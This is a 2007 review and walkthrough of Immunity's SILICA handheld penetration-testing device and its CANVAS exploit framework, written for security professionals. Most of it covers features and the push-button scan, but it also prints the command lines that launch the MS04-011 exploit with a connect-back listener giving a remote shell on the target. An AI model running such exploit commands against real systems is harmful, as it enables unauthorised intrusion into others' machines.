Security Reference Guide

Penetration Testing with SILICA

Last updated Mar 23, 2007.

Imagine a device that, with the push of a button, automatically scans for wireless networks, connects to them, and then attacks each and every device on the network. Sound like something out of Hollywood? Well, the device is real, and for $3600 you too can own one — and then own everyone.

The device, formally known as the SILICA, was created by Immunity to assist penetration testers with their work. It officially hit the shelves in February 2007, but has been making some headlines over the last year as Immunity demonstrated it at various conferences. Thankfully, White Wolf Security was gracious enough to let us borrow theirs and give it a whirl. Quite honestly, we were expecting to be a bit disappointed because media hype is usually exaggerated. However, not only were we dead wrong about that assumption, but we will go so far as to highly recommend this device to anyone interested in penetration testing from the palm of your hand.

If you a bit concerned that anyone could buy one of these and use it irresponsibly, rest assured that Immunity is not selling this device to just anyone. First, you have to come up with $3600 just to get your foot in the door. Secondly, Immunity supposedly is checking to be sure that you are legit and that your money wasn't stolen. Finally, the SILICA has to be updated periodically to keep it current with the latest exploits and to fix various bugs that tend to afflict new concepts. During this update process, Immunity verifies that the device is licensed and could very easily delete their application off of a device that has been used maliciously.

The SILICA has two main user groups. The first group will be the penetration tester/auditor who wants to perform a covert scan of their targets business. This type of user will simply get within close proximity of the site they want to test, hit the scan button, hang out for a few minutes while the SILICA does its job, and then review the report to help them determine further actions. Typically speaking, the SILICA will be used in this case to perform quick in and out audits, which is exactly what it was designed to do.

However, the SILICA can be much more than just a basic scan and attack device. Contained within its small form factor is the very powerful and customizable CANVAS penetration testing platform/framework from Immunity. With this in hand, quite literally, a penetration tester can do much more than simply scan a network for vulnerabilities. For example, they could program the device to download files from any unprotected shares, install backdoors, create user accounts on vulnerable systems, and much more. It is really up to the imagination of the owner as to the limits of the attack.

As mentioned earlier, the core component of the SILICA is the CANVAS penetration engine from Immunity. This framework allows penetration testers to quickly and easily locate vulnerable computers and then "hack" them. Currently, there are over 150 different exploits within the tool that can be used to attack anything that connects to a network — from operating system to application. The beauty of using CANVAS in the SILICA is that the user gets all the flexibility it offers. Since CANVAS is really nothing more than a large collection of cleverly organized and programmed Pythons scripts, a penetration tester can easily modify or create their own scripts to turn the SILICA into a customized attack tool.

There are two main ways to interact with the guts of the SILICA. The first is via the included X Terminal program, which drops you to the all powerful shell. You then type sudo gainroot, which will give you root level access to everything on the device. While this method does work, it is rather tedious to type commands into the device using the on-screen keyboard. So, the SILICA does contain a fully functional SSH server that can be accessed using the root account. Prior to attempting this, you will need the root password, which you can set using the passwd program once you have used the "gainroot" method of getting into the root account.

So, let's get cracking. In this first example, we are going to let our device scan the network in easy mode. To do this, we just turn on the device, go to Programs — Extras — SILICA from the menu (Figure 1). Next we simply hit the Scan button located on the easy to use interface (Figure 2) and the SILICA does the rest. Figure 3 and 4 show what it looks like at the SILICA scans the network. By default, if a system is found to be lacking, the SILICA will exploit a vulnerability and take a screenshot of the computer, which it will then display in the final HTML report.

While this method of attacking is rather neat, we wanted to see what else we could do with the SILICA. So, we opened up the shell and started to poke around manually. There are really two main scripts that are used by the device, and they can be executed manually from shell.

./exploits/VulnAssess/VulnAssess.py performs a vulnerability assessment against a selected target, and ./exploits/massattack/massattack.py attempts to attack the system and find a way in. Both of these are handy ways to just test a single system, which is one feature that the SILICA does not yet support.

However, since CANVAS is designed to be modular, you can also manually attack a system and gain shell access to it, or more. We decided to try out the manual approach against a known vulnerable system. So, we found our way over to the ./exploits/ms04_011 folder and reviewed the script. As with most of the exploit scripts, this one can be launched by itself. Within each of the files are instructions on how to use the script, and in this case those instructions were:

./exploits/ms04_011/ms04_011.py -v 0 -t <targetIP> -l <listenerIP> -d 5555
./commandlineInterface.py -v 1 -p 5555 -i fromcreatethread

These instructions will open up a listener on port 5555 on the SILICA, to which the shellcode will be told to connect back to. Once connected, the listener spawns a command line to the "hacked" box. The following provide a few screen shots detailing the attack.

Obviously there is a lot this little device can do. We should also point that the SILICA is actually a Nokia N800, which runs a stripped down version of Debian Linux. It is no surprise that there are many, many people out there who are programming or porting over hundreds of applications for the N800, some of which are very cool. For example, you can install Metasploit (another penetration testing platform), Kismet, Aircrack-ng, and even entertainment programs like mplayer. Simply put, the SILICA can become your personal entertainment toy when at home, and your attack system while at work.

If you are a security expert, work for a three lettered agency, or can justify the price, then you will want to consider one of these little devices.

We would like to especially thank White Wolf Security for allowing us to borrow this device and Immunity for answering all of our questions. As most know, good support can make the difference between a frustrated user and a happy one — and Immunity was very quick in helping us out.

White Wolf Security is a provider of high-end, tailored, hands-on Information Security training and exercises. They are unique because their courses move beyond the technology. Their diverse team of instructors are pulled from a variety of backgrounds. As a result, they are able to address the technical, legal, policy and national security issues that surround information and it uses and are able to meet the needs of the customers — from the corporate world to members of DoD and Federal Law Enforcement. .

To facilitate optimal training environment, White Wolf operates a full time learning facility in Lancaster, PA known simply as "The Center." The Center is more than a classroom. In it, they provide a variety of equipment, network infrastructure and technology in a working, live environment. In this fashion, students learn through lecture, hands-on, and other dynamic means including live investigations and war-gaming. This provides true application-based learning.